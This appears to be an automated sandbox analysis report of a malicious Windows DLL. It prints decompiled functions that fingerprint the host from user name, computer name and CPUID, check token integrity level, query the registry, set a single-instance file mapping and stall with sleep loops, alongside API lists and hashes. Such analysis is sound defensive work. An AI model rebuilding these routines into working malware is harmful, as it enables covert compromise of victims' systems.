                                						_t90 = _t66 - 3;
                                						_v12 = _t66;
                                						if(_t66 != 3) {
                                							goto L6;
                                						} else {
                                							_v8.LowPart = E052F3032(_t73, _t90,  &_v92, _a4, _a8);
                                						}
                                						goto L12;
                                						L17:
                                						__eflags = _t61 - 0x10d2;
                                						if(_t61 != 0x10d2) {
                                							_push(0xffffffff);
                                							_push(0xff676980);
                                							_push(0);
                                							_push( *0x52fa29c);
                                							goto L21;
                                						} else {
                                							__eflags =  *0x52fa2a0; // 0xa
                                							if(__eflags == 0) {
                                								goto L12;
                                							} else {
                                								_t61 = E052F1492();
                                								_push(0xffffffff);
                                								_push(0xdc3cba00);
                                								_push(0);
                                								_push( *0x52fa2a0);
                                								L21:
                                								L052F7D8C();
                                								_v36.LowPart = _t61;
                                								_v32 = _t76;
                                								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
                                								_t65 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                								__eflags = _t65;
                                								_v8.LowPart = _t65;
                                								if(_t65 == 0) {
                                									goto L6;
                                								} else {
                                									goto L12;
                                								}
                                							}
                                						}
                                						L25:
                                					}
                                					L12:
                                					_t78 =  &_v92;
                                					_t71 = 3;
                                					do {
                                						_t54 =  *_t78;
                                						if(_t54 != 0) {
                                							HeapFree( *0x52fa290, 0, _t54);
                                						}
                                						_t78 =  &(_t78[4]);
                                						_t71 = _t71 - 1;
                                					} while (_t71 != 0);
                                					CloseHandle(_v44);
                                				}
                                				return _v8;
                                				goto L25;
                                			}




























                                APIs
                                • memset.NTDLL ref: 052F2037
                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 052F2043
                                • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 052F2068
                                • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 052F2084
                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 052F209D
                                • HeapFree.KERNEL32(00000000,00000000), ref: 052F2132
                                • CloseHandle.KERNEL32(?), ref: 052F2141
                                • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 052F217B
                                • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,052F560C), ref: 052F2191
                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 052F219C
                                  • Part of subcall function 052F1AB8: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,07459340,?,00000000,30314549,00000014,004F0053,074592FC), ref: 052F1BA4
                                  • Part of subcall function 052F1AB8: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,052F20B0), ref: 052F1BB6
                                • GetLastError.KERNEL32 ref: 052F21AE
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp
                                Similarity
                                • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                • String ID:
                                • API String ID: 3521023985-0
                                • Opcode ID: 57e7dc89629ace93390378df82c8da594037536997153f6aa84a8b71c57e600f
                                • Instruction ID: e18f907ab2acbe3c8bf28b03f8c7673f2ce5af0cfdc7e6c5b668bf4f5e592f26
                                • Opcode Fuzzy Hash: 57e7dc89629ace93390378df82c8da594037536997153f6aa84a8b71c57e600f
                                • Instruction Fuzzy Hash: 18513C75925229EADF10DF94FC49DEEBFB9FF05760F10412AF619A2190DB718680CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 74%
                                			E052F6384(intOrPtr __edx, void** _a4, void** _a8) {
                                				intOrPtr _v8;
                                				struct _FILETIME* _v12;
                                				short _v56;
                                				struct _FILETIME* _t12;
                                				intOrPtr _t13;
                                				void* _t17;
                                				void* _t21;
                                				intOrPtr _t27;
                                				long _t28;
                                				void* _t30;
                                
                                				_t27 = __edx;
                                				_t12 =  &_v12;
                                				GetSystemTimeAsFileTime(_t12);
                                				_push(0x192);
                                				_push(0x54d38000);
                                				_push(_v8);
                                				_push(_v12);
                                				L052F7D86();
                                				_push(_t12);
                                				_v12 = _t12;
                                				_t13 =  *0x52fa2d4; // 0x215d5a8
                                				_t5 = _t13 + 0x52fb8a2; // 0x7458e4a
                                				_t6 = _t13 + 0x52fb57c; // 0x530025
                                				_push(0x16);
                                				_push( &_v56);
                                				_v8 = _t27;
                                				L052F7A6A();
                                				_t17 = CreateFileMappingW(0xffffffff, 0x52fa2f8, 4, 0, 0x1000,  &_v56); // executed
                                				_t30 = _t17;
                                				if(_t30 == 0) {
                                					_t28 = GetLastError();
                                				} else {
                                					if(GetLastError() == 0xb7) {
                                						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
                                						if(_t21 == 0) {
                                							_t28 = GetLastError();
                                							if(_t28 != 0) {
                                								goto L6;
                                							}
                                						} else {
                                							 *_a4 = _t30;
                                							 *_a8 = _t21;
                                							_t28 = 0;
                                						}
                                					} else {
                                						_t28 = 2;
                                						L6:
                                						CloseHandle(_t30);
                                					}
                                				}
                                				return _t28;
                                			}













                                APIs
                                • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,052F5488,?,00000001,?), ref: 052F6390
                                • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 052F63A6
                                • _snwprintf.NTDLL ref: 052F63CB
                                • CreateFileMappingW.KERNELBASE(000000FF,052FA2F8,00000004,00000000,00001000,?), ref: 052F63E7
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,052F5488,?), ref: 052F63F9
                                • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 052F6410
                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,052F5488), ref: 052F6431
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,052F5488,?), ref: 052F6439
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp
                                Similarity
                                • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                • String ID:
                                • API String ID: 1814172918-0
                                • Opcode ID: 65857a13ef2f27c024d81ff8f3f9b9f4d20e877e18d888618b3c993e2103d8eb
                                • Instruction ID: 82e272299a9d30fea85616532e78d7d57d1257900281908517ee065b32ab69b8
                                • Opcode Fuzzy Hash: 65857a13ef2f27c024d81ff8f3f9b9f4d20e877e18d888618b3c993e2103d8eb
                                • Instruction Fuzzy Hash: 4F219672650214BBD721AB64FC0AF9DBBB9EF44750F244135FA06E72C0DB70A5418B60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 96%
                                			E052F4454(char __eax, signed int* __esi) {
                                				long _v8;
                                				char _v12;
                                				signed int _v16;
                                				signed int _v20;
                                				signed int _v28;
                                				long _t34;
                                				signed int _t39;
                                				long _t50;
                                				char _t59;
                                				intOrPtr _t61;
                                				void* _t62;
                                				void* _t63;
                                				signed int* _t64;
                                				char _t65;
                                				intOrPtr* _t67;
                                				void* _t68;
                                				signed int* _t69;
                                
                                				_t69 = __esi;
                                				_t65 = __eax;
                                				_v8 = 0;
                                				_v12 = __eax;
                                				if(__eax == 0) {
                                					_t59 =  *0x52fa2c8; // 0xbd092303
                                					_v12 = _t59;
                                				}
                                				_t64 = _t69;
                                				E052F143F( &_v12, _t64);
                                				if(_t65 != 0) {
                                					 *_t69 =  *_t69 ^  *0x52fa2d0 ^ 0x4c0ca0ae;
                                				} else {
                                					GetUserNameW(0,  &_v8); // executed
                                					_t50 = _v8;
                                					if(_t50 != 0) {
                                						_t62 = RtlAllocateHeap( *0x52fa290, 0, _t50 + _t50);
                                						if(_t62 != 0) {
                                							if(GetUserNameW(_t62,  &_v8) != 0) {
                                								_t63 = _t62;
                                								 *_t69 =  *_t69 ^ E052F283A(_v8 + _v8, _t63);
                                							}
                                							HeapFree( *0x52fa290, 0, _t62);
                                						}
                                					}
                                				}
                                				_t61 = __imp__;
                                				_v8 = _v8 & 0x00000000;
                                				GetComputerNameW(0,  &_v8);
                                				_t34 = _v8;
                                				if(_t34 != 0) {
                                					_t68 = RtlAllocateHeap( *0x52fa290, 0, _t34 + _t34);
                                					if(_t68 != 0) {
                                						if(GetComputerNameW(_t68,  &_v8) != 0) {
                                							_t63 = _t68;
                                							_t69[3] = _t69[3] ^ E052F283A(_v8 + _v8, _t63);
                                						}
                                						HeapFree( *0x52fa290, 0, _t68);
                                					}
                                				}
                                				asm("cpuid");
                                				_t67 =  &_v28;
                                				 *_t67 = 1;
                                				 *((intOrPtr*)(_t67 + 4)) = _t61;
                                				 *(_t67 + 8) = _t63;
                                				 *(_t67 + 0xc) = _t64;
                                				_t39 = _v16 ^ _v20 ^ _v28;
                                				_t69[1] = _t69[1] ^ _t39;
                                				return _t39;
                                			}

                                APIs
                                • GetUserNameW.ADVAPI32(00000000,052F55CE), ref: 052F448B
                                • RtlAllocateHeap.NTDLL(00000000,052F55CE), ref: 052F44A2
                                • GetUserNameW.ADVAPI32(00000000,052F55CE), ref: 052F44AF
                                • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,052F55CE,?,?,?,?,?,052F6BD8,?,00000001), ref: 052F44D0
                                • GetComputerNameW.KERNEL32(00000000,00000000), ref: 052F44F7
                                • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 052F450B
                                • GetComputerNameW.KERNEL32(00000000,00000000), ref: 052F4518
                                • HeapFree.KERNEL32(00000000,00000000), ref: 052F4536
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp
                                Similarity
                                • API ID: HeapName$AllocateComputerFreeUser
                                • String ID:
                                • API String ID: 3239747167-0
                                • Opcode ID: 2434074f989eb7543e27bf7301f2502a06a5b1192155e8dcaa7214b390988e0a
                                • Instruction ID: a23cfddd26d38c5b75454a3160a7294b86107f11ad8825ae49f04720344ad0c2
                                • Opcode Fuzzy Hash: 2434074f989eb7543e27bf7301f2502a06a5b1192155e8dcaa7214b390988e0a
                                • Instruction Fuzzy Hash: 6931097162420AAFDB11EFA9F985B6EFBF9FF48210F104439E609D2250EB71DA409B50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 64%
                                			E052F53F2(signed int __edx) {
                                				signed int _v8;
                                				long _v12;
                                				signed int _v16;
                                				long _v20;
                                				void* _v24;
                                				intOrPtr _v28;
                                				intOrPtr _v32;
                                				intOrPtr _v36;
                                				char _v40;
                                				void* __edi;
                                				void* __esi;
                                				void* _t27;
                                				long _t28;
                                				long _t31;
                                				intOrPtr _t32;
                                				void* _t36;
                                				signed int _t37;
                                				intOrPtr _t38;
                                				void* _t39;
                                				CHAR* _t42;
                                				long _t48;
                                				long _t49;
                                				void* _t54;
                                				void* _t56;
                                				intOrPtr _t64;
                                				void* _t67;
                                				long _t71;
                                				void* _t72;
                                				signed char _t74;
                                				intOrPtr _t76;
                                				signed int _t77;
                                				long _t82;
                                				long _t84;
                                				CHAR* _t87;
                                				void* _t88;
                                
                                				_t79 = __edx;
                                				_v16 = 0;
                                				_v8 = 0;
                                				_v12 = 0;
                                				_t27 = E052F58F8();
                                				if(_t27 != 0) {
                                					_t77 =  *0x52fa2b4; // 0x4000000a
                                					_t73 = (_t77 & 0xf0000000) + _t27;
                                					 *0x52fa2b4 = (_t77 & 0xf0000000) + _t27;
                                				}
                                				_t28 =  *0x52fa148(0, 2); // executed
                                				_v20 = _t28;
                                				if(_t28 == 0 || _t28 == 1 || _t28 == 0x80010106) {
                                					_t31 = E052F696F( &_v8,  &_v16); // executed
                                					_push(0);
                                					_t84 = _t31;
                                					_t32 =  *0x52fa2d4; // 0x215d5a8
                                					_push(0x52fa2fc);
                                					_push(1);
                                					_t7 = _t32 + 0x52fb5ad; // 0x4d283a53
                                					 *0x52fa2f8 = 0xc;
                                					 *0x52fa300 = 0;
                                					L052F4AF8();
                                					_t36 = E052F6384(_t79,  &_v24,  &_v12); // executed
                                					if(_t36 == 0) {
                                						CloseHandle(_v24);
                                					}
                                					if(_t84 != 5) {
                                						_t37 = _v16;
                                						__eflags = _t37;
                                						if(_t37 != 0) {
                                							E052F4454(_t37 ^ 0xe8fa7dd7,  &_v40);
                                							_t87 = E052F6837(0x27);
                                							__eflags = _t87;
                                							if(_t87 != 0) {
                                								asm("bswap eax");
                                								asm("bswap eax");
                                								asm("bswap eax");
                                								asm("bswap eax");
                                								_t64 =  *0x52fa2d4; // 0x215d5a8
                                								_t18 = _t64 + 0x52fb84f; // 0x78383025
                                								wsprintfA(_t87, _t18, _v40, _v36, _v32, _v28);
                                								_t88 = _t88 + 0x18;
                                							}
                                							 *0x52fa32c = _t87;
                                						}
                                						_t38 = E052F60E1();
                                						 *0x52fa2c8 =  *0x52fa2c8 ^ 0xe8fa7dd7;
                                						 *0x52fa31c = _t38;
                                						_t39 = E052F6837(0x60);
                                						__eflags = _t39;
                                						 *0x52fa37c = _t39;
                                						if(_t39 == 0) {
                                							_t84 = 8;
                                						} else {
                                							memset(_t39, 0, 0x60);
                                							_t54 =  *0x52fa37c; // 0x7459630
                                							_t88 = _t88 + 0xc;
                                							__imp__(_t54 + 0x40);
                                							_t56 =  *0x52fa37c; // 0x7459630
                                							 *_t56 = 0x52fb83e;
                                							_t84 = 0;
                                						}
                                						__eflags = _t84;
                                						if(_t84 == 0) {
                                							_t42 = RtlAllocateHeap( *0x52fa290, _t84, 0x43);
                                							__eflags = _t42;
                                							 *0x52fa314 = _t42;
                                							if(_t42 == 0) {
                                								_t84 = 8;
                                							} else {
                                								_t74 =  *0x52fa2b4; // 0x4000000a
                                								_t79 = _t74 & 0x000000ff;
                                								_t76 =  *0x52fa2d4; // 0x215d5a8
                                								_t19 = _t76 + 0x52fb53a; // 0x697a6f4d
                                								_t73 = _t19;
                                								wsprintfA(_t42, _t19, _t74 & 0x000000ff, _t74 & 0x000000ff, 0x52f92a7);
                                							}
                                							__eflags = _t84;
                                							if(_t84 == 0) {
                                								asm("sbb eax, eax");
                                								E052F4454( ~_v8 &  *0x52fa2c8, 0x52fa00c); // executed
                                								_t84 = E052F2206(_t73);
                                								__eflags = _t84;
                                								if(_t84 != 0) {
                                									goto L31;
                                								}
                                								_t48 = E052F1376();
                                								__eflags = _t48;
                                								if(_t48 != 0) {
                                									__eflags = _v8;
                                									_t82 = _v12;
                                									if(_v8 != 0) {
                                										L30:
                                										_t49 = E052F2022(_t79, _t82, _v8); // executed
                                										_t84 = _t49;
                                										goto L31;
                                									}
                                									__eflags = _t82;
                                									if(__eflags == 0) {
                                										goto L31;
                                									}
                                									_t23 = _t82 + 4; // 0x5
                                									_t84 = E052F2439(__eflags, _t23);
                                									__eflags = _t84;
                                									if(_t84 == 0) {
                                										goto L31;
                                									}
                                									goto L30;
                                								}
                                								_t84 = 8;
                                							}
                                						}
                                					} else {
                                						_t71 = _v12;
                                						if(_t71 == 0) {
                                							L31:
                                							if(_v20 == 0 || _v20 == 1) {
                                								 *0x52fa14c();
                                							}
                                							goto L35;
                                						}
                                						_t72 = _t71 + 4;
                                						do {
                                							_push(1);
                                							_push(_t72);
                                							_t67 = 5;
                                						} while (E052F6BE1(_t67, 0) == 0x4c7);
                                					}
                                					goto L31;
                                				} else {
                                					_t84 = _t28;
                                					L35:
                                					return _t84;
                                				}
                                			}

                                APIs
                                  • Part of subcall function 052F58F8: GetModuleHandleA.KERNEL32(4C44544E,00000000,052F540B,00000000,00000000,00000000,?,?,?,?,?,052F6BD8,?,00000001), ref: 052F5907
                                • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(4D283A53,00000001,052FA2FC,00000000), ref: 052F5476
                                • CloseHandle.KERNEL32(?,?,00000001,?,?,?,?,?,?,?,052F6BD8,?,00000001), ref: 052F548F
                                • wsprintfA.USER32 ref: 052F550F
                                • memset.NTDLL ref: 052F553F
                                • RtlInitializeCriticalSection.NTDLL(074595F0), ref: 052F5550
                                • RtlAllocateHeap.NTDLL(00000008,00000043,00000060), ref: 052F5579
                                • wsprintfA.USER32 ref: 052F55A9
                                  • Part of subcall function 052F4454: GetUserNameW.ADVAPI32(00000000,052F55CE), ref: 052F448B
                                  • Part of subcall function 052F4454: RtlAllocateHeap.NTDLL(00000000,052F55CE), ref: 052F44A2
                                  • Part of subcall function 052F4454: GetUserNameW.ADVAPI32(00000000,052F55CE), ref: 052F44AF
                                  • Part of subcall function 052F4454: HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,052F55CE,?,?,?,?,?,052F6BD8,?,00000001), ref: 052F44D0
                                  • Part of subcall function 052F4454: GetComputerNameW.KERNEL32(00000000,00000000), ref: 052F44F7
                                  • Part of subcall function 052F4454: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 052F450B
                                  • Part of subcall function 052F4454: GetComputerNameW.KERNEL32(00000000,00000000), ref: 052F4518
                                  • Part of subcall function 052F4454: HeapFree.KERNEL32(00000000,00000000), ref: 052F4536
                                  • Part of subcall function 052F6837: RtlAllocateHeap.NTDLL(00000000,00000000,052F4197), ref: 052F6843
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp
                                Similarity
                                • API ID: Heap$AllocateName$ComputerDescriptorFreeHandleSecurityUserwsprintf$CloseConvertCriticalInitializeModuleSectionStringmemset
                                • String ID:
                                • API String ID: 2910951584-0
                                • Opcode ID: 25284562e2e70c8729b18e03b3aff681cf78cecfe5a25e6c3d43d264f309014d
                                • Instruction ID: 189b1859808b6fcd0fea510b48f7478f67962a25f2ffcfbf421b56e1ff0d9e13
                                • Opcode Fuzzy Hash: 25284562e2e70c8729b18e03b3aff681cf78cecfe5a25e6c3d43d264f309014d
                                • Instruction Fuzzy Hash: 2E518171B30216ABDB15DBA4F84EB6EFBA9BF44720F150035FA19E7280DB75D9408B90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E052F113D(long* _a4) {
                                				long _v8;
                                				void* _v12;
                                				void _v16;
                                				long _v20;
                                				int _t33;
                                				void* _t46;
                                
                                				_v16 = 1;
                                				_v20 = 0x2000;
                                				if( *0x52fa2b4 > 5) {
                                					_v16 = 0;
                                					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
                                						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
                                						_v8 = 0;
                                						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
                                						if(_v8 != 0) {
                                							_t46 = E052F6837(_v8);
                                							if(_t46 != 0) {
                                								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
                                								if(_t33 != 0) {
                                									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
                                								}
                                								E052F50CA(_t46);
                                							}
                                						}
                                						CloseHandle(_v12);
                                					}
                                				}
                                				 *_a4 = _v20;
                                				return _v16;
                                			}










                                APIs
                                • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 052F116F
                                • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,00000000,00000000), ref: 052F118F
                                • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000), ref: 052F119F
                                • CloseHandle.KERNEL32(00000000), ref: 052F11EF
                                  • Part of subcall function 052F6837: RtlAllocateHeap.NTDLL(00000000,00000000,052F4197), ref: 052F6843
                                • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000,00000000,?), ref: 052F11C2
                                • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 052F11CA
                                • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 052F11DA
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp
                                Similarity
                                • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                • String ID:
                                • API String ID: 1295030180-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 73%
                                			E052F6B0F(signed int __edx, intOrPtr _a4) {
                                				struct _FILETIME _v12;
                                				char _v32;
                                				long _v40;
                                				void* _t14;
                                				void* _t16;
                                				int _t18;
                                				signed int _t20;
                                				void* _t22;
                                				signed int _t23;
                                				intOrPtr _t25;
                                				unsigned int _t29;
                                				signed int _t33;
                                				signed int _t40;
                                
                                				_t33 = __edx;
                                				_t14 = HeapCreate(0, 0x400000, 0); // executed
                                				 *0x52fa290 = _t14;
                                				if(_t14 != 0) {
                                					 *0x52fa180 = GetTickCount();
                                					_t16 = E052F4C1B(_a4);
                                					if(_t16 != 0) {
                                						L10:
                                						return _t16;
                                					} else {
                                						goto L3;
                                					}
                                					do {
                                						L3:
                                						GetSystemTimeAsFileTime( &_v12);
                                						_t18 = SwitchToThread();
                                						_t29 = _v12.dwHighDateTime;
                                						_t20 = (_t29 << 0x00000020 | _v12.dwLowDateTime) >> 7;
                                						_push(0);
                                						_push(9);
                                						_push(_t29 >> 7);
                                						_push(_t20);
                                						L052F7EEA();
                                						_t40 = _t18 + _t20;
                                						_t22 = E052F414A(_a4, _t40);
                                						_t23 = 2;
                                						Sleep(_t23 << _t40); // executed
                                					} while (_t22 == 1);
                                					_t25 =  *0x52fa2ac; // 0x310
                                					_v32 = 0;
                                					if(_t25 != 0) {
                                						__imp__(_t25,  &_v32);
                                						if(_t25 == 0) {
                                							_v40 = 0;
                                						}
                                						if(_v40 != 0) {
                                							 *0x52fa2b8 = 1; // executed
                                						}
                                					}
                                					_t16 = E052F53F2(_t33); // executed
                                					goto L10;
                                				}
                                				_t16 = 8;
                                				goto L10;
                                			}

















                                APIs
                                • HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 052F6B24
                                • GetTickCount.KERNEL32 ref: 052F6B3B
                                • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001), ref: 052F6B5B
                                • SwitchToThread.KERNEL32(?,00000001), ref: 052F6B61
                                • _aullrem.NTDLL(?,?,00000009,00000000), ref: 052F6B7D
                                • Sleep.KERNELBASE(00000002,00000000,?,00000001), ref: 052F6B97
                                • IsWow64Process.KERNEL32(00000310,?,?,00000001), ref: 052F6BB5
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp
                                Similarity
                                • API ID: Time$CountCreateFileHeapProcessSleepSwitchSystemThreadTickWow64_aullrem
                                • String ID:
                                • API String ID: 3690864001-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E052F71A5(void* __ecx, void* __eflags) {
                                				char _v8;
                                				void* _v12;
                                				int _v16;
                                				int _v20;
                                				intOrPtr _t15;
                                				intOrPtr _t19;
                                				long _t24;
                                				long _t29;
                                				short* _t31;
                                				short* _t34;
                                
                                				_t15 =  *0x52fa2d4; // 0x215d5a8
                                				_v8 = _v8 & 0x00000000;
                                				_t3 = _t15 + 0x52fba30; // 0x4f0053
                                				_v16 = 4;
                                				_t31 = E052F3875(__ecx, _t3);
                                				if(_t31 != 0) {
                                					_t19 =  *0x52fa2d4; // 0x215d5a8
                                					_t5 = _t19 + 0x52fba8c; // 0x6e0049
                                					_t34 = E052F3875(__ecx, _t5);
                                					if(_t34 != 0) {
                                						_t24 = RegOpenKeyExW(0x80000002, _t31, 0, 0x20119,  &_v12); // executed
                                						if(_t24 == 0) {
                                							_t29 = RegQueryValueExW(_v12, _t34, 0,  &_v20,  &_v8,  &_v16); // executed
                                							if(_t29 != 0) {
                                								_v8 = _v8 & 0x00000000;
                                							}
                                							RegCloseKey(_v12);
                                						}
                                						E052F50CA(_t34);
                                					}
                                					E052F50CA(_t31);
                                				}
                                				return _v8;
                                			}














                                APIs
                                  • Part of subcall function 052F3875: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,052F71C8,004F0053,00000000,?), ref: 052F387E
                                  • Part of subcall function 052F3875: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,052F71C8,004F0053,00000000,?), ref: 052F38A8
                                  • Part of subcall function 052F3875: memset.NTDLL ref: 052F38BC
                                • RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020119,00000000,006E0049,?,004F0053,00000000,?), ref: 052F71F7
                                • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000004,00000000,00000004), ref: 052F7213
                                • RegCloseKey.ADVAPI32(00000000), ref: 052F7224
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp
                                Similarity
                                • API ID: CloseOpenQueryValuelstrlenmemcpymemset
                                • String ID:
                                • API String ID: 830012212-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                				intOrPtr _t4;
                                				void* _t10;
                                				signed int _t11;
                                				void* _t13;
                                
                                				_t13 = 1;
                                				_t4 = _a8;
                                				if(_t4 == 0) {
                                					if(InterlockedDecrement(0x52fa294) == 0) {
                                						E052F5076();
                                					}
                                				} else {
                                					if(_t4 == 1 && InterlockedIncrement(0x52fa294) == 1) {
                                						_t10 = E052F6B0F(_t11, _a4); // executed
                                						if(_t10 != 0) {
                                							_t13 = 0;
                                						}
                                					}
                                				}
                                				return _t13;
                                			}








                                APIs
                                • InterlockedIncrement.KERNEL32(052FA294), ref: 052F569A
                                  • Part of subcall function 052F6B0F: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 052F6B24
                                • InterlockedDecrement.KERNEL32(052FA294), ref: 052F56BA
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp
                                Similarity
                                • API ID: Interlocked$CreateDecrementHeapIncrement
                                • String ID:
                                • API String ID: 3834848776-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 87%
                                			E052F1AB8(void* __edx) {
                                				char _v8;
                                				char _v12;
                                				void* _v16;
                                				void* __edi;
                                				void* __esi;
                                				void* _t23;
                                				intOrPtr _t24;
                                				intOrPtr _t32;
                                				intOrPtr _t35;
                                				intOrPtr _t38;
                                				intOrPtr _t42;
                                				void* _t45;
                                				void* _t50;
                                				void* _t52;
                                
                                				_t50 = __edx;
                                				_v12 = 0;
                                				_t23 = E052F4C8C(0,  &_v8); // executed
                                				if(_t23 != 0) {
                                					_v8 = 0;
                                				}
                                				_t24 =  *0x52fa2d4; // 0x215d5a8
                                				_t4 = _t24 + 0x52fbd60; // 0x7459308
                                				_t5 = _t24 + 0x52fbd08; // 0x4f0053
                                				_t45 = E052F5384( &_v16, _v8, _t5, _t4);
                                				if(_t45 == 0) {
                                					 *0x52fa124(_v16, 0,  &_v12);
